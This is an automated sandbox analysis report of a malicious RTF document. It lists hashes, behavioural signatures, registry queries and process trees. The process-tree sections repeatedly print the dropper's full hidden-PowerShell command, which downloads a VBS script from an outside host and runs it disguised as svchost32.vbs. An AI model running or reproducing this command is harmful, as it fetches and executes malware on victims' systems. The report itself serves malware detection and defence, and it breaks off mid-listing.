fe2eb895f13534b1380c37f467e31b4f5ee42d092442924b5baac6b03325549e

Analysis

max time kernel
149s
max time network
136s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
09-07-2024 12:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

306bed698ed9a2b33c376c4668dcb774_JaffaCakes118.rtf
Size

737KB
MD5

306bed698ed9a2b33c376c4668dcb774
SHA1

754e53e33f2745bc86b98a27bdb837d083356780
SHA256

fe2eb895f13534b1380c37f467e31b4f5ee42d092442924b5baac6b03325549e
SHA512

7f021846f92bf0c1a7b6c5f464a718c87829a288b18af30f45a924e6749a0a3ddb1460e9c0c2a552d1cf1c0f373a2008599c9eb1a578ada809b5180a1cc4c068
SSDEEP

6144:W6fiH+6fiHl6fiHq6fiHr6fiHW6fiH56fiHz6fiHk6fiHM6fiH9m6:WSRWHy9fYQ5J

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://fast-cargo.com/images/file/vb/35.vbs

Signatures

Process spawned unexpected child process 10 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3852	404	cmd.exe	83
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4792	1532	cmd.exe	92
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3860	2884	cmd.exe	97
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4032	1936	cmd.exe	103
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	112	4708	cmd.exe	109
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3440	4920	cmd.exe	114
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1904	1300	cmd.exe	119
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4824	2800	cmd.exe	124
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2432	4496	cmd.exe	129
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3220	1008	cmd.exe	134

Blocklisted process makes network request 10 IoCs

flow	pid	Process
10	3152	powershell.exe
31	1712	powershell.exe
36	4644	powershell.exe
53	756	powershell.exe
57	4824	powershell.exe
62	3596	powershell.exe
72	1768	powershell.exe
76	112	powershell.exe
84	4788	powershell.exe
88	1768	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1712	powershell.exe
4644	powershell.exe
1768	powershell.exe
1768	powershell.exe
3152	powershell.exe
756	powershell.exe
4824	powershell.exe
3596	powershell.exe
112	powershell.exe
4788	powershell.exe

Checks processor information in registry 2 TTPs 63 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe

Enumerates system info in registry 2 TTPs 63 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1500	WINWORD.EXE
1500	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3152	powershell.exe
3152	powershell.exe
1712	powershell.exe
1712	powershell.exe
4644	powershell.exe
4644	powershell.exe
756	powershell.exe
756	powershell.exe
4824	powershell.exe
4824	powershell.exe
3596	powershell.exe
3596	powershell.exe
1768	powershell.exe
1768	powershell.exe
112	powershell.exe
112	powershell.exe
4788	powershell.exe
4788	powershell.exe
1768	powershell.exe
1768	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	756	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	112	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1500	WINWORD.EXE
1500	WINWORD.EXE

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
404	EXCEL.EXE
404	EXCEL.EXE
404	EXCEL.EXE
404	EXCEL.EXE
404	EXCEL.EXE
404	EXCEL.EXE
404	EXCEL.EXE
1532	EXCEL.EXE
1532	EXCEL.EXE
1532	EXCEL.EXE
1532	EXCEL.EXE
1532	EXCEL.EXE
1532	EXCEL.EXE
1532	EXCEL.EXE
2884	EXCEL.EXE
2884	EXCEL.EXE
2884	EXCEL.EXE
2884	EXCEL.EXE
2884	EXCEL.EXE
2884	EXCEL.EXE
2884	EXCEL.EXE
1936	EXCEL.EXE
1936	EXCEL.EXE
1936	EXCEL.EXE
1936	EXCEL.EXE
1936	EXCEL.EXE
1936	EXCEL.EXE
1936	EXCEL.EXE
4708	EXCEL.EXE
4708	EXCEL.EXE
4708	EXCEL.EXE
4708	EXCEL.EXE
4708	EXCEL.EXE
4708	EXCEL.EXE
4708	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
4920	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
2800	EXCEL.EXE
2800	EXCEL.EXE
2800	EXCEL.EXE
2800	EXCEL.EXE
2800	EXCEL.EXE
2800	EXCEL.EXE
2800	EXCEL.EXE
4496	EXCEL.EXE
4496	EXCEL.EXE
4496	EXCEL.EXE
4496	EXCEL.EXE
4496	EXCEL.EXE

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 404 wrote to memory of 3852	404	EXCEL.EXE	85
PID 404 wrote to memory of 3852	404	EXCEL.EXE	85
PID 3852 wrote to memory of 3152	3852	cmd.exe	88
PID 3852 wrote to memory of 3152	3852	cmd.exe	88
PID 3152 wrote to memory of 4996	3152	powershell.exe	91
PID 3152 wrote to memory of 4996	3152	powershell.exe	91
PID 1532 wrote to memory of 4792	1532	EXCEL.EXE	93
PID 1532 wrote to memory of 4792	1532	EXCEL.EXE	93
PID 4792 wrote to memory of 1712	4792	cmd.exe	95
PID 4792 wrote to memory of 1712	4792	cmd.exe	95
PID 1712 wrote to memory of 2564	1712	powershell.exe	96
PID 1712 wrote to memory of 2564	1712	powershell.exe	96
PID 2884 wrote to memory of 3860	2884	EXCEL.EXE	98
PID 2884 wrote to memory of 3860	2884	EXCEL.EXE	98
PID 3860 wrote to memory of 4644	3860	cmd.exe	100
PID 3860 wrote to memory of 4644	3860	cmd.exe	100
PID 4644 wrote to memory of 4128	4644	powershell.exe	101
PID 4644 wrote to memory of 4128	4644	powershell.exe	101
PID 1936 wrote to memory of 4032	1936	EXCEL.EXE	104
PID 1936 wrote to memory of 4032	1936	EXCEL.EXE	104
PID 4032 wrote to memory of 756	4032	cmd.exe	106
PID 4032 wrote to memory of 756	4032	cmd.exe	106
PID 756 wrote to memory of 640	756	powershell.exe	107
PID 756 wrote to memory of 640	756	powershell.exe	107
PID 4708 wrote to memory of 112	4708	EXCEL.EXE	110
PID 4708 wrote to memory of 112	4708	EXCEL.EXE	110
PID 112 wrote to memory of 4824	112	cmd.exe	112
PID 112 wrote to memory of 4824	112	cmd.exe	112
PID 4824 wrote to memory of 2456	4824	powershell.exe	113
PID 4824 wrote to memory of 2456	4824	powershell.exe	113
PID 4920 wrote to memory of 3440	4920	EXCEL.EXE	115
PID 4920 wrote to memory of 3440	4920	EXCEL.EXE	115
PID 3440 wrote to memory of 3596	3440	cmd.exe	117
PID 3440 wrote to memory of 3596	3440	cmd.exe	117
PID 3596 wrote to memory of 4504	3596	powershell.exe	118
PID 3596 wrote to memory of 4504	3596	powershell.exe	118
PID 1300 wrote to memory of 1904	1300	EXCEL.EXE	120
PID 1300 wrote to memory of 1904	1300	EXCEL.EXE	120
PID 1904 wrote to memory of 1768	1904	cmd.exe	122
PID 1904 wrote to memory of 1768	1904	cmd.exe	122
PID 1768 wrote to memory of 1716	1768	powershell.exe	123
PID 1768 wrote to memory of 1716	1768	powershell.exe	123
PID 2800 wrote to memory of 4824	2800	EXCEL.EXE	125
PID 2800 wrote to memory of 4824	2800	EXCEL.EXE	125
PID 4824 wrote to memory of 112	4824	cmd.exe	127
PID 4824 wrote to memory of 112	4824	cmd.exe	127
PID 112 wrote to memory of 4724	112	powershell.exe	128
PID 112 wrote to memory of 4724	112	powershell.exe	128
PID 4496 wrote to memory of 2432	4496	EXCEL.EXE	130
PID 4496 wrote to memory of 2432	4496	EXCEL.EXE	130
PID 2432 wrote to memory of 4788	2432	cmd.exe	132
PID 2432 wrote to memory of 4788	2432	cmd.exe	132
PID 4788 wrote to memory of 4528	4788	powershell.exe	133
PID 4788 wrote to memory of 4528	4788	powershell.exe	133
PID 1008 wrote to memory of 3220	1008	EXCEL.EXE	135
PID 1008 wrote to memory of 3220	1008	EXCEL.EXE	135
PID 3220 wrote to memory of 1768	3220	cmd.exe	137
PID 3220 wrote to memory of 1768	3220	cmd.exe	137
PID 1768 wrote to memory of 2032	1768	powershell.exe	138
PID 1768 wrote to memory of 2032	1768	powershell.exe	138

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\306bed698ed9a2b33c376c4668dcb774_JaffaCakes118.rtf" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1500

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:404
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','C:\Users\Public\\svchost32.vbs');Start-Process 'C:\Users\Public\\svchost32.vbs'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3152
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\svchost32.vbs"
      4⤵
      PID:4996

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1532
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','C:\Users\Public\\svchost32.vbs');Start-Process 'C:\Users\Public\\svchost32.vbs'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1712
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\svchost32.vbs"
      4⤵
      PID:2564

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2884
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','C:\Users\Public\\svchost32.vbs');Start-Process 'C:\Users\Public\\svchost32.vbs'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4644
  - - C:\Windows\System32\WScript.exe
